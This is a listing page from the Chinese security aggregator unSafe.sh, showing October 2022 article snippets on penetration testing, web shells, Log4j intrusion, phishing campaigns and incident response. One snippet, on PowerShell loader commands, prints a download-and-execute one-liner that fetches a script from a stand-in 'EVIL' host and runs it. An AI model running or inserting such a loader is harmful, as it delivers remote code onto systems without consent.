unSafe.sh - 不安全
我的收藏
今日热榜
公众号文章
导航
Github CVE
Github Tools
编码/解码
文件传输
Twitter Bot
Telegram Bot
Rss
黑夜模式
域内持久化后门
首发先知社区:https://xz.aliyun.com/t/9964可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的ha...
2022-10-4 11:15:15 | 阅读: 10 |
收藏
|
渗透安全团队
jack
lsa
admincount
151877218
一次Fastadmin后台getshell的渗透记录
1.信息搜集自从先来看看目标站点的各种信息后端PHP,前端使用layui,路由URL规则看起来像ThinkPHP,那自然想到的是ThinkPHP那些年爆发的命令执行了,准备一把梭!然而,尝试了一番,并...
2022-10-4 11:15:5 | 阅读: 12 |
收藏
|
渗透安全团队
fastadmin
信息
数据库
数据
漏洞
九九重阳,九九相伴!
值此庆祝重阳节之际,星球提供50元代金卷,先到先得哦!如果感兴趣的话欢迎师傅们扫描下方二维码加入我们。我们的运营团队将一如既往地继续为大家做好服务!dotNet安全矩阵星球从创建以来一直聚焦于.NET...
2022-10-4 11:2:37 | 阅读: 17 |
收藏
|
dotNet安全矩阵
安全
攻防
漏洞
审计
之际
BurpSuite测试中一些常用tips
渗透测试用到Burp时候很多,整理了一些tips供测试时候更得心应手~光标错位和中文显示新版一打开容易光标错位,默认情况下使用字体是Courier New,显示不了中文。换用Monospaced字体即...
2022-10-4 09:48:3 | 阅读: 17 |
收藏
|
渗透师老A
burp
浏览器
选项卡
代理
流量
WSH:一款功能强大的Web Shell生成器和命令行接口工具
关于WSH WSH是一款功能强大的Web Shell生成器和命令行接口工具。我们考虑到只用一个HTTP客户端来跟Webshell交互其实是一件很痛苦的事,我们需要在表格中输入命令,然后再点各种按钮。...
2022-10-4 09:13:14 | 阅读: 17 |
收藏
|
黑白之道
wsh
php
trim
mfob
s3cr3t
实战|Log4j打点后与管理员斗智斗勇
概述信息收集Log4j进入内网内网横向 第一阶段 第二阶段 被发现 再打个口子 继续横向 又掉了 LDAP 爆破结果思考依旧是某省HVV红队的经历。过程中只用到很简单的方法,所以加了个...
2022-10-4 09:13:11 | 阅读: 22 |
收藏
|
黑白之道
数据
漏洞
代理
爆破
log4j
鼠标悬停也能中招!带毒PPT正用来传播Graphite恶意软件
据Bleeping Computer网站消息,俄罗斯黑客已经开始使用一种新的代码执行技术,该技术依赖于 Microsoft PowerPoint 演示文稿(PPT)中的鼠标移动来触发恶意 PowerS...
2022-10-4 09:13:9 | 阅读: 13 |
收藏
|
黑白之道
graphite
攻击
攻击者
microsoft
网安部门发布假期提示:这些“不明”二维码、WiFi信号要当心!又暴雷了!某知名区块链钱包被盗!用户损失过亿!
网安部门发布假期提示:这些“不明”二维码、WiFi信号要当心!假期出游,很多公共场所、景点向游客提供免费WiFi信号,这些免费WiFi信号极易被犯罪分子利用,进而通过网络入侵游客手机系统,广大网友要谨...
2022-10-4 09:13:5 | 阅读: 16 |
收藏
|
黑白之道
安全
黑客
网络
信息
假期
WSH:一款功能强大的Web Shell生成器和命令行接口工具
关于WSH WSH是一款功能强大的Web Shell生成器和命令行接口工具。我们考虑到只用一个HTTP客户端来跟Webshell交互其实是一件很痛苦的事,我们需要在表格中输入命令,然后再点各种按钮。...
2022-10-4 09:3:29 | 阅读: 15 |
收藏
|
FreeBuf
wsh
php
trim
mfob
s3cr3t
GitHub用户注意,网络钓鱼活动冒充CircleCI窃取凭证
9月26日消息,GitHub警告称,有网络钓鱼活动冒充CircleCI DevOps平台,瞄准GitHub用户窃取证书和双因素身份验证(2FA)代码。GitHub自9月16日发现该活动,钓鱼信息声称用...
2022-10-4 09:3:25 | 阅读: 10 |
收藏
|
FreeBuf
github
钓鱼
circleci
威胁
攻击
不成熟的黑客组织 ModernLoader 针对东欧地区发起攻击
思科在六月发现了一个发起三次独立攻击行动的攻击者,攻击者的技术并没有高超到定制化开发工具,而是使用了现成的工具。没有明显的迹象表明攻击者的身份,只知道这些攻击者可能会说俄语。【攻击链条】攻击者使用开源...
2022-10-4 09:3:23 | 阅读: 21 |
收藏
|
FreeBuf
攻击
攻击者
miner
木马
redline
速查!Python某漏洞15年未修,影响35万余个项目
据The Hacker News 9月22日报道,Python模块中存在一个长达15年未修复的安全漏洞,可能导致35万余个开源项目被利用,涉及人工智能/机器学习、网络开发、媒体、安全、IT管理等多个领...
2022-10-4 09:3:20 | 阅读: 22 |
收藏
|
FreeBuf
漏洞
安全
python
tarfile
攻击
台湾省电视剧黑客VS大陆网剧黑客
免责声明由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即...
2022-10-4 09:0:52 | 阅读: 39 |
收藏
|
李白你好
李白
你好
安全
黑客
烦请
实战 | 记一次网吧挖矿应急响应
原创投稿作者:夜无名0x01 前言 网上很少有关于对网吧应急类的文章,正好在今年的工作中处置过一起网吧挖矿的安全事件应急,网吧的网络环境与企业单位的环境都是天差地别的存在,网吧的网络环境杂乱无章各种...
2022-10-4 09:0:50 | 阅读: 27 |
收藏
|
HACK学习呀
网吧
客户机
技术员
网络
249
一些有趣的powershell加载命令
普通下载IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")PowerShell 3.0+IEX (iwr 'ht...
2022-10-4 08:31:2 | 阅读: 26 |
收藏
|
天驿安全
xmlhttp
comobject
nslookup
Linux应急处置/信息搜集/漏洞检测工具
Linux应急处置/信息搜集/漏洞检测工具,支持基础配置/网络流量/任务计划/环境变量/用户信息/Services/bash/恶意文件/内核Rootkit/SSH/Webshell/挖矿文件/挖矿进程...
2022-10-4 08:31:1 | 阅读: 13 |
收藏
|
HACK之道
信息
ssh
网络
流量
黑客
任意账号密码重置的6种方法
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雾晓安全及文章作者不为此承担任何责任。一、短信验证码回传1、原理通...
2022-10-4 08:3:43 | 阅读: 24 |
收藏
|
雾晓安全
信息
找回
账号
数据
APK自动化漏洞检测工具 -- appshark
===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负...
2022-10-4 08:1:13 | 阅读: 43 |
收藏
|
Web安全工具库
安全
appshark
数据
apk
github
Vulnhub_DC2-WalkThrough 's Range clearance record BY FUCK*******
免责声明本打靶文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本公众号及其本人无关.靶机地址https://www.vulnhub.com/entry/dc-2...
2022-10-4 00:2:21 | 阅读: 13 |
收藏
|
猫因的安全
爆破
cewl
jerry
wordpress
wpscan
谷歌插件superSearch
0x01 开发初衷 本人菜鸡一枚,偶尔挖点漏洞提360众测和补天,提交漏洞的时候需要查询权重相关信息是否符合要求,然后去其他网站查询,有点麻烦,所以就写了这个小插件。0x02 安装与使用1、直接...
2022-10-3 23:42:30 | 阅读: 24 |
收藏
|
三零二
信息
漏洞
github
反查
零零
Previous
1277
1278
1279
1280
1281
1282
1283
1284
Next